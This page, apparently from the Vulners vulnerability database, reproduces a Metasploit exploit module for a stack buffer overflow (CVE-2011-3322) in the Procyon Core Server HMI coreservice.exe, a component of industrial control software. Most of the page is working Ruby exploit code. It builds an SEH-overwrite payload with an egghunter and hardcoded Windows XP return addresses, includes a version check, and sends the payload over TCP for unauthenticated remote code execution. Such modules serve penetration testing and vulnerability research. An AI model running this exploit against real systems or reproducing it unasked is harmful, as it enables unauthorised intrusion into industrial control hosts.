Lucene search
K

Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow

🗓️ 12 Sep 2011 17:54:31Reported by Knud Hojgaard <[email protected]>, mr_me <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 17 Views

Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow vulnerability allows unauthenticated remote code execution

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability in the coreservice.exe component of Proycon
        Core Server <= v1.13. While processing a password, the application
        fails to do proper bounds checking before copying data into a small buffer on the stack.
        This causes a buffer overflow and allows to overwrite a structured exception handling
        record on the stack, allowing for unauthenticated remote code execution.  Also, after the
        payload exits, Coreservice.exe should automatically recover.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Knud Hojgaard <keh[at]nsense.dk>',        # Initial discovery
          'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
        ],
      'References'     =>
        [
          ['CVE', '2011-3322'],
          ['OSVDB', '75371'],
          ['URL', 'http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d",
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [

          [
            'Windows XP SP3 - No dep bypass',
            {
              'Ret'    => 0x774699bf, # JMP ESP [user32.dll]
              'Edx'    => 0x1D847770, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
              'Eax'    => 0x01010106, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
              'Offset' => 8
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2011-09-08',
      'DefaultTarget'  => 0))

      register_options(
      [
        Opt::RPORT(23)
      ])
  end

  def check
    connect
    res = (sock.get_once || '').chomp  #This gives us string "----------------------------"
    res = (sock.get_once || '').chomp  #This gives us the actual software version
    disconnect

    if res =~ /Core Command Interface V1\.(.*)2/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit

    eggoptions =
    {
      :checksum => false,
      :eggtag => 'ssec',
    }

    badchars = "\x00\x0a\x0d"
    hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

    sploit = rand_text_alpha_upper(45)
    sploit << [target['Edx']].pack('V')
    sploit << [0x41414141].pack('V')
    sploit << [target['Eax']].pack('V')
    sploit << rand_text_alpha_upper(target['Offset'])
    sploit << [target.ret].pack('V')
    sploit << make_nops(10)
    sploit << hunter
    sploit << rand_text_alpha_upper(500)
    sploit << egg
    sploit << "\r\n"

    connect
    sock.get_once()
    print_status("Sending request...")
    sock.put(sploit)
    handler()
    disconnect

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation